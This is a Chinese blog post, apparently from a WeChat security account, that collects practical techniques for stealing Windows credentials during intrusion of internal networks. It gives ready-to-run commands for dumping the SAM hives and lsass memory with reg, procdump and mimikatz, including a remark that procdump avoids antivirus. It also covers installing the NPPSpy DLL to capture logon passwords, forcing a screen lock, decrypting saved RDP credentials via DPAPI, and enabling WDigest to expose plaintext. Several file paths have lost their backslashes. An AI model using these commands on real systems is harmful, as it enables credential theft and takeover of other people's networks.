“ 在内网渗透中,要想进行的顺利,抓取hash&明文起到功不可没的作用,所以在实战中总结了几种常用的抓取密码的方式,在这里分享出来,欢迎师傅们补充”
01
—
reg配合本地mimikatz
1.利用工具:
mimikatz+reg doc命令
2.测试机器:
Windows server 2008r2
3.首先利用reg命令进行转储hash
reg save hklmsystem systemreg save hklmsam sam
2.将转储好的hash下载到本地,再使用mimikatz进行导出
lsadump::sam /sam:sam /system:system
然后找到administrator或者域账户的hash进行解密,如果解密不成功可以进行hash传递攻击
02
—
目标机器上传mimikatz直接导出
-
利用工具
mimikatz
2.测试机器
Windows server 2008 r2
3.mimikatz常规方式进行抓密码
将mimikatz上传到目标服务器中
privilege::debug 提升权限sekurlsa::logonpasswords 抓取明文密码
03
—
procdump配合mimikatz本地导出
1.利用工具:
mimikatz+procdump
procdump项目地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
2.测试机器:
Windows server 2008r2
3.介绍
由于procdump是微软的旗下的产品,所以杀软不会进行查杀
3.将procdump上传到目标机器中
执行以下命令进行转储hash
procdump -accepteula -ma lsass.exe lsass.dmp
4.配合本地mimikatz进行获取hash
sekurlsa::minidump lsass.dmp #这里也可以跟上绝对路径sekurlsa::tspkg
发现可以成功获取,这种也是和将mimikatz上传到目标服务器的抓取密码那种差不多
04
—
powershell通过键盘记录抓取密码
1.利用工具:
PasswordStealing
https://github.com/gtworek/PSBits/tree/master/PasswordStealing2.测试机器:
Windows 7
3.使用管理员权限将文件夹内的-NPPSPY.dll放到C:Windowssystem32中
copy .NPPSPY.dll C:windowsSystem32
4.使用管理权限执行
powershell.exe -Exec Bypass .ConfigureRegistrySettings.ps1
5.注销账户/重启系统,重新登录
rundll32.exe user32.dll,LockWorkStation #迫使管理员锁屏
6.等到管理员重新登录
在 C 盘根目录下可以看到NPPSpy.txt里面记录了刚刚登录的账号和密码
05
—
抓取管理员远程桌面保存的密码
1.利用工具:
mimikatz
2.测试机器:
Windows server 2008r2
3.准备环境
将Windows server 2008 r2随便登录一台机器,并且保存密码
4.抓取保存记录
cmdkey /list # 查看当前保存的凭据列表
dir /a %userprofile%AppDataLocalMicrosoftCredentials* # 遍历 Credentials目录下保存的凭据
99B4C386131B767B4338614ACA3ED610
可以看到上图有一个保存的凭据
5.构造命令
将刚才的99B4C386131B767B4338614ACA3ED610和现在你拿下的web服务器的用户名,进行拼接
当前用户名
dpapi::cred /in:C:UsersadministratorAppDataLocalMicrosoftCredentials99B4C386131B767B4338614ACA3ED610dpapi::cred /in:C:Users<用户名>AppDataLocalMicrosoftCredentials<凭据文件>
6.抓取masterkey
发现下图,得到的 pbData 就是凭据的加密数据,guidMasterKey 是凭据的 GUID。
然后将上图中得到的 guidMasterKey 值( {xxx-xxx-xxx-xxx-xxx})记录下来并执行以下命令,找到与 guidMasterKey 也就是下图执行结果中的 GUID 相关联的 MasterKey:
执行完成上述命令,该pbData已经加载到mimi当中,我们再进行执行以下命令即可获取Masterkey
privilege::debug #提升mimi的权限sekurlsa::dpapi #加载缓存pbData生成Masterkey
发现成功抓出masterkey
87be1a0035f6e202115ddce9167794b8c904ef8f4ef8f4e7d81ee0848984e82140692c625d2fd1593712f9c9bdabdedd5ef720d77f4dae25b04902ebe5983a887d3c5
7.获取保存凭据
最后执行以下命令,使用上面找到的 MasterKey 值破解指定的凭据文件 99B4C386131B767B4338614ACA3ED610:
然后将Masterkey拼接命令如下
获取凭证
dpapi::cred /in:C:UsersadministratorAppDataLocalMicrosoftCredentials99B4C386131B767B4338614ACA3ED610 /MasterKey:87be1a0035f6e202115ddce9167794b8c904ef8f4ef8f4e7d81ee0848984e82140692c625d2fd1593712f9c9bdabdedd5ef720d77f4dae25b04902ebe5983a887d3c5
虚拟机太小所以拼接一张图,
总结:抓取保存的rdp密码,一定是管理员登录rdp时候保存的,如果不是保存的就抓不到,所以根据自己的实战情况而定
06
—
修改注册表
1.利用工具:
mimikatz+reg doc命令
2.测试机器:
Windows server 2016
3.介绍
Windows server2012以上版本,不支持抓取明文的,所以就只能通过修改注册表,管理员注销重新登录才能进行抓取,这个跟上面的抓取键盘记录的有点类似,但是这个范围要更广,可以将该服务器上登录过的 用户都给抓出来
4.修改注册表
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
5.锁定工作台
rundll32.exe user32.dll,LockWorkStation
重新登录
6.使用mimikatz进行导出
privilege::debugsekurlsa::logonpasswords #导出明文
今天的文章就到这里,欢迎师傅们三连,补充
原文始发于微信公众号(chaosec):实战中抓取hash姿势总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论